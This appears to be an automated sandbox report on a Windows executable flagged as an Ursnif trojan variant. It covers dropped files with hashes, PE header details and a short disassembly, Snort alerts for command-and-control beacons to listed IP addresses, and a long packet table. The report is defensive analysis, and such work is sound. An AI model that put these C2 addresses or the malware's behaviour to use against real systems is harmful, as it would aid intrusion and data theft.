Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jEc...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(............... ...................................... 6............ H............ P.....P ......].........c.....l.....x.....}...............]. ...]...!.].%...]............3.3.....6.......H.......P...........

C:\Users\user\AppData\Roaming\Microsoft\MarkClass

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	54
Entropy (8bit):	4.239175068238206
Encrypted:	false
SSDEEP:	3:NMXPRV5g7UjcRIGnTjFZa:qXPRV5g7U0nba
MD5:	D525BBDF44DDD1FE96CE008DC0B63C09
SHA1:	F09DBA251BFE2B1D245EC341A1B3A79FE603140E
SHA-256:	1ADCEB6B75E25E9A2AFACFF7B18A7CC6475C62787CF15BEC88C228ADA6EB45C7
SHA-512:	4DB1F5D6C3A8DE4EFB131ECB0D344D364449D126C7C8A7EAC825305188DAC1524782A69D35EA98DA5A055074C56D752A85FC3399DBB0BF3B3310EE83077D780C
Malicious:	false
Reputation:	unknown
Preview:	11-10-2022 15:04:25 \| "0xaaa494e7_6314cd46c4ff5" \| 0..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4481
Entropy (8bit):	3.7930133822256877
Encrypted:	false
SSDEEP:	48:F3kV04PJdL9P9Az9Pfoi8/wSogZob9Y9PT9Pfoi8/wSogZob9Y9jH:yV04j9P96vmHg9Y97vmHg9Y9r
MD5:	93E04B1FA8B054CD47097EDAFE9A9F44
SHA1:	F74F6484C037C5E56F25D92A6BC491980C61C0C9
SHA-256:	0AFB0B97B9D66851F840DFE48734CEE3956CD79E1A1DE256B5BA01CF3065D165
SHA-512:	26197CD44FD908F4ACBF0567A06DDD4B2A4E92C800BF38FCFD12854536E089D12CA9FE7C63CF5E3A00E7851B63D884E7712B11FFFEB68600A8516A8A44FFF2BB
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F. .. ....e..q....m-.q....e..q...F.........................:..DG..Yr?.D..U..k0.&...&...........-...e..q...../.q.......t.".CFSF..2.F...KUhh .WHITEB~1.LNK....t.Y^...H.g.3..(.....gVA.G..k...L......KUhhKUhh....T}........................W.h.i.t.e.B.o.o.k...l.n.k...H...K...............-.......J...........-........C:\Users\user\WhiteBook.lnk..`.......X.......374653...........!a..%.H.VZAj...-1X.eI...........!a..%.H.VZAj...-1X.eI..................Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ...........................FL..................F.".. ....#N.........-...#N......@...........................P.O. .:i.....+00.../C:\...................V.1......U1m..Windows.@......L..KU'h..............................W.i.n.d.o.w.s.....Z.1......U+m..System32..B......L..KU'h.............................S.y.s.t.e.m.3.2.....l.1......L...WINDOW~1..T.....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O5JBBM3G0ZBJCNQGHQJ3.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4481
Entropy (8bit):	3.7930133822256877
Encrypted:	false
SSDEEP:	48:F3kV04PJdL9P9Az9Pfoi8/wSogZob9Y9PT9Pfoi8/wSogZob9Y9jH:yV04j9P96vmHg9Y97vmHg9Y9r
MD5:	93E04B1FA8B054CD47097EDAFE9A9F44
SHA1:	F74F6484C037C5E56F25D92A6BC491980C61C0C9
SHA-256:	0AFB0B97B9D66851F840DFE48734CEE3956CD79E1A1DE256B5BA01CF3065D165
SHA-512:	26197CD44FD908F4ACBF0567A06DDD4B2A4E92C800BF38FCFD12854536E089D12CA9FE7C63CF5E3A00E7851B63D884E7712B11FFFEB68600A8516A8A44FFF2BB
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F. .. ....e..q....m-.q....e..q...F.........................:..DG..Yr?.D..U..k0.&...&...........-...e..q...../.q.......t.".CFSF..2.F...KUhh .WHITEB~1.LNK....t.Y^...H.g.3..(.....gVA.G..k...L......KUhhKUhh....T}........................W.h.i.t.e.B.o.o.k...l.n.k...H...K...............-.......J...........-........C:\Users\user\WhiteBook.lnk..`.......X.......374653...........!a..%.H.VZAj...-1X.eI...........!a..%.H.VZAj...-1X.eI..................Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ...........................FL..................F.".. ....#N.........-...#N......@...........................P.O. .:i.....+00.../C:\...................V.1......U1m..Windows.@......L..KU'h..............................W.i.n.d.o.w.s.....Z.1......U+m..System32..B......L..KU'h.............................S.y.s.t.e.m.3.2.....l.1......L...WINDOW~1..T.....

\Device\ConDrv

Download File

Process:	C:\Windows\System32\nltest.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	80
Entropy (8bit):	4.981198332810094
Encrypted:	false
SSDEEP:	3:OQIyB2FBKs8YIC2ERyH+ch6wrkIZHv:OQIygF88FXcRrkcP
MD5:	4FDBAE9775A20DC33DEC05E408C2A2AD
SHA1:	3EAA51632F2BEAE23D9811B9FF91E31C91092177
SHA-256:	228CD867898AB0B81D31212B2DA03CC3E349C9000DFB33E77410E2937CEA8532
SHA-512:	6FF34B7848CE3DBCE1D150107B54A1903D074058C04DE0B8B647071F5E310045CC7A7E74F6B6EED24E2E54F5C10B0899B63CF97D6A40C9DA07C3BBE373B294BB
Malicious:	false
Reputation:	unknown
Preview:	Enumerating domain trusts failed: Status = 1722 0x6ba RPC_S_SERVER_UNAVAILABLE..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.475018130166141
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Lx6.exe
File size:	38400
MD5:	3b892bea0f8cbe0b61ee380743567d1d
SHA1:	90522132e3a97e966e5270a8e105cc33f0d6c4e5
SHA256:	6b722961edc010c5487de4ef7eee84b586ac3c3f06dbd1920935ea5f7bb90543
SHA512:	120c7f3d22858dd7cb02f67bf6ff38dd9ba1f32d6fdfe18c7f9dde76ab20b435f98f4e4e54b7967422755cb6dedf0c575d360a1339c3a4cff69f556647045e3b
SSDEEP:	768:Z41V8UHIm2wyBdcNtW2RTYBfx6w39rDE3Lkjx2K/ZK38ua:ZefIZwAdeD8B56w39HE384h38
TLSH:	F103F1A418107CBFDF2FE13B6315E11EA5B583C1150B0EC9E274E6DDE276422EA5C28E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.................l.........S.............v.......k.......n.....Rich............PE..L......b...................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x401af6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x62DFB311 [Tue Jul 26 09:25:37 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	a225a198dd77b77924eb15a705beb665

Entrypoint Preview

Instruction
push esi
xor esi, esi
push esi
push 00400000h
push esi
call dword ptr [0040301Ch]
mov dword ptr [00404160h], eax
cmp eax, esi
je 00007F6FACCFD137h
push esi
call dword ptr [00403008h]
mov dword ptr [00404170h], eax
call dword ptr [00403040h]
call 00007F6FACCFCC62h
push dword ptr [00404160h]
mov esi, eax
call dword ptr [0040303Ch]
push esi
call dword ptr [00403044h]
pop esi
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
push 00000020h
call 00007F6FACCFC899h
mov esi, eax
test esi, esi
je 00007F6FACCFD1D1h
mov eax, dword ptr [00404184h]
lea eax, dword ptr [eax+00405014h]
push eax
call dword ptr [00403008h]
mov edi, dword ptr [00403078h]
mov ebx, eax
mov eax, dword ptr [00404184h]
lea eax, dword ptr [eax+00405151h]
push eax
push ebx
mov dword ptr [ebp-04h], 0000007Fh
call edi
mov dword ptr [esi+0Ch], eax
test eax, eax
je 00007F6FACCFD18Eh
mov eax, dword ptr [00404184h]
lea eax, dword ptr [eax+00405161h]
push eax
push ebx
call edi
mov dword ptr [esi+10h], eax
test eax, eax
je 00007F6FACCFD178h
mov eax, dword ptr [00404184h]
lea eax, dword ptr [eax+00405174h]
push eax
push ebx
call edi
mov dword ptr [esi+14h], eax
test eax, eax
je 00007F6FACCFD162h
mov eax, dword ptr [00404184h]
lea eax, dword ptr [eax+00000000h]

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3100	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6000	0x10	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7000	0xe4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3000	0xb0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1032	0x1200	False	0.6486545138888888	data	6.161261111602468	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x3000	0x4fe	0x600	False	0.4765625	data	4.589727757248314	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4000	0x194	0x200	False	0.056640625	data	0.12227588125913882	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x5000	0x2dc	0x400	False	0.7626953125	data	6.293260607563598	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6000	0x10	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7000	0x8000	0x7200	False	0.9707373903508771	data	7.859943871884214	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ntdll.dll	_snwprintf, memset, NtQuerySystemInformation, _aulldiv
KERNEL32.dll	GetModuleHandleA, GetLocaleInfoA, GetSystemDefaultUILanguage, HeapAlloc, HeapFree, HeapCreate, Sleep, ExitThread, lstrlenW, GetLastError, VerLanguageNameA, GetExitCodeThread, CloseHandle, HeapDestroy, GetCommandLineW, ExitProcess, WaitForSingleObject, GetModuleFileNameW, CreateThread, QueueUserAPC, SetLastError, TerminateThread, SleepEx, OpenProcess, CreateEventA, GetLongPathNameW, GetVersion, GetCurrentProcessId, GetProcAddress, LoadLibraryA, VirtualProtect, VirtualFree, VirtualAlloc, MapViewOfFile, GetSystemTimeAsFileTime, CreateFileMappingW
ADVAPI32.dll	ConvertStringSecurityDescriptorToSecurityDescriptorA

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.4194.76.225.6149703802033204 10/11/22-15:05:22.646934	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49703	80	192.168.2.4	194.76.225.61
192.168.2.4194.76.225.6149703802033203 10/11/22-15:04:23.184080	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49703	80	192.168.2.4	194.76.225.61
192.168.2.452.169.118.17349701802033203 10/11/22-15:04:05.807282	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49701	80	192.168.2.4	52.169.118.173
192.168.2.452.169.118.17349698802033203 10/11/22-15:01:36.640930	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49698	80	192.168.2.4	52.169.118.173
192.168.2.452.169.118.17349698802033204 10/11/22-15:01:36.640930	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49698	80	192.168.2.4	52.169.118.173
192.168.2.4194.76.225.6149703802021814 10/11/22-15:05:22.646934	TCP	2021814	ET TROJAN Ursnif Variant CnC Beacon 3	49703	80	192.168.2.4	194.76.225.61
192.168.2.4194.76.225.6049700802033204 10/11/22-15:01:58.649008	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49700	80	192.168.2.4	194.76.225.60
192.168.2.4194.76.225.6049700802033203 10/11/22-15:01:58.649008	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49700	80	192.168.2.4	194.76.225.60

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 11, 2022 15:01:57.874542952 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:57.901532888 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:57.901772022 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:57.902332067 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:57.929052114 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.113888025 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.113917112 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.113931894 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.114109039 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.114145041 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.114202023 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.114213943 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.114228964 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.114259005 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.114490032 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.114511967 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.114525080 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.114542007 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.114558935 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.114953995 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.115010023 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.115015984 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.115056038 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.115109921 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.115124941 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.115171909 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.115336895 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.115389109 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.141719103 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.141745090 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.141760111 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.141885042 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.141915083 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.141921997 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.141936064 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.141954899 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.141967058 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.141973019 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.141985893 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.141997099 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142033100 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142076969 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142119884 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142170906 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142184973 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142210007 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142319918 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142337084 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142349958 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142371893 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142391920 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142405033 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142422915 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142436028 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142446041 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142476082 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142597914 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142616034 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142628908 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142644882 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142646074 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142671108 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142679930 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142690897 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142693043 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142720938 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142868042 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142896891 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142910004 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142923117 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142927885 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142952919 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142962933 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.142973900 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.142976999 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.143002987 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.170586109 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.170638084 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.170664072 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.170692921 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.170722008 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.170742989 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.170768023 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.170804977 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.171019077 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.171050072 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.171144009 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.171161890 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.171192884 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.171245098 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.171261072 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.171267033 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.171289921 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.171745062 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.171776056 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.171794891 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.171830893 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.171855927 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.172018051 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.172046900 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.172065973 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.172066927 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.172091961 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.172374964 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.172406912 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.172422886 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.172425985 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.172446966 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.172538042 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.172568083 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.172580957 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.172589064 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.172611952 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.172863960 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.172888994 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.172900915 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.172918081 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.172971964 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.173086882 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.173111916 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.173141956 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.173150063 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.173196077 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.173379898 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.173398972 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.173425913 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.173429012 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.173465967 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.173484087 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.173525095 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.173525095 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.173553944 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.173568010 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.173686028 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.173724890 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.173728943 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.173738956 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.173760891 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.173846006 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.173883915 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.173888922 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.173923969 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.173945904 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.174169064 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.174189091 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.174202919 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.174276114 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.174562931 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.174582005 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.174595118 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.174611092 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.174633980 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.174804926 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.174844027 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.174850941 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.174864054 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.174900055 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.175257921 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.175276995 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.175302982 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.175563097 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.175604105 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.175625086 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.175709963 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.175726891 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.175786972 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.175872087 CEST	49700	80	192.168.2.4	194.76.225.60
Oct 11, 2022 15:01:58.198420048 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.198565006 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.198581934 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.198601007 CEST	80	49700	194.76.225.60	192.168.2.4
Oct 11, 2022 15:01:58.198620081 CEST	80	49700	194.76.225.60	192.168.2.4
